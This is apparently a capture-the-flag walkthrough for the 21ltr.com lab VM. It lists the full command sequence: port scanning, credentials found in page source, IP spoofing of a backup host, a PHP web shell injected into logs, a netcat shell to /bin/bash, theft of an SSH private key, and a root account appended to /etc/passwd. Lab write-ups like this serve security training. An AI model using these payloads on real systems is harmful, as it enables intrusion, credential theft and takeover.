#HackOnTuesday Episode 8 Hack remote servers using vulnerable trust relationships

After a long break, the #HackOnTuesday episodes are back! In today’s episode we will hack the 21ltr.com CTF VM by first identifying the vulnerable trust relationship between the main VM and a backup system use by the VM, and by then impersonating the backup system in order to exploit the trust relationship and hack the 21ltr.com VM.

Tools, Scripts, and Exploits

Your Heading Here

» Identify all the host in the target network
   • nmap –sn 192.168.2.0/24
» Identify the services listening on the server.
   • nmap –v –Pn –sT 192.168.2.120 –p-
   • nmap –sV 192.168.2.120 –p 21, 22, 80
» Look for any vulnerable Web application
   • Open Firefox and go to http://192.168.2.120/
   • Open a new terminal and run dirbuster
      - cd 21ltr
      - clear
      - dirbuster # Use the wordlist at /usr/share/wordlists/directory-list-2.3-medium.txt
   • View source code on Firefox.
      - Hidden in the HTML source code there is a username and password!!
» Test whether the found credentials can be used to connect to either SSH or FTP.
   • ssh logs@192.168.2.120 # type the password
      - Login failed
   • ftp 192.168.2.120 # type username (e.g. logs) and password
      - Login successful
» Look for any interesting file in the FTP server.
   • ls
   • lcd /root/21ltr
   • get backup_log.php
   • quit
   • cat backup_log.php
      - Take note of the IP mentioned in the script.
» Find the correct path to backup_log.php
   • Go to http://192.168.2.120/backup_log.php # Page not found!
   • Go to http://192.168.2.120/logs/backup_log.php # Bingo!
» Change your IP to the one found in the backup_log.php script and look if there is any way to inject something in the logs.
   • ifconfig eth0 down
   • ifconfig eth0 192.168.2.240/24
   • ifconfig eth0 up
   • wireshark& # set the filter to ip.addr == 192.168.2.120
      - Apparently, every 5-10 minutes there is a connection attempt on port 10000.
» Learn more about the connection attempt on port 10000
   • nc -lvp 10000 > out.bin
   • file out.bin
   • mv out.bin out.gz
   • gunzip out.gz
   • file out
   • tar xvf out
   • ls –lFh
   • cd media/backup
   • tar xzvf pxelinux.cfg.tar.gz
» No interesting information seems to be contained in the pxelinux.cfg.tar.gz archive. However, after re-running nmap, I saw a new open port: port 10001. This port seemed to open only for a short period of time right after the backup archive is sent to us.
» Analyze the service on port 10001
   • nc -nlvp 10000 > data.tar.gz && nc -nv 192.168.2.120 10001
   • type ? help
   • Go to Firefox and refresh. Bingo! We have a way to inject something in the logs.
» Inject a PHP shell in the logs
   • type <?php echo exec($_GET[“cmd”]);?>
   • Go to ?cmd=whereis nc
   • Go to ?cmd=whereis bash
   • Go to ?cmd=nc -nlvp 4444 -e /bin/bash
   • Open a new terminal and type nc -nv 192.168.2.120 44444
» Look for sensitive data
   • cat /etc/passwd
   • ls /home/jgreen
   • ls /home/hbeale
   • ls /tmp
   • cd /tmp
   • tar tvf backup.tar.gz # most likely the file we got from the server
   • ls /media
   • ls /media/backup # same file
   • cd /media/USB_1
   • ls –lFh
   • cd Stuff
   • ls -lFh
   • cd Keys
   • ls -lFh
   • cat id_rsa # Private key but don’t know from who. Maybe root, maybe jgreen, or maybe hbeale.
» Use the private key to connect to the system.
   • Copy private key to a local file called key.
   • chmod 600 key
   • ssh -i key root@192.168.2.120 # Login failed
   • ssh -i key hbeale@192.168.2.120 # Login successful
» Escalate to root
   • List the allowed (and forbidden) commands for the invoking user.
      - sudo -l
   • Add an account with root priviledges
      - sudo /usr/bin/cat >> /etc/passwd # Add gianni::0:0::/root:/bin/bash and then press enter and CTRL+C
   • su gianni
» Game Over!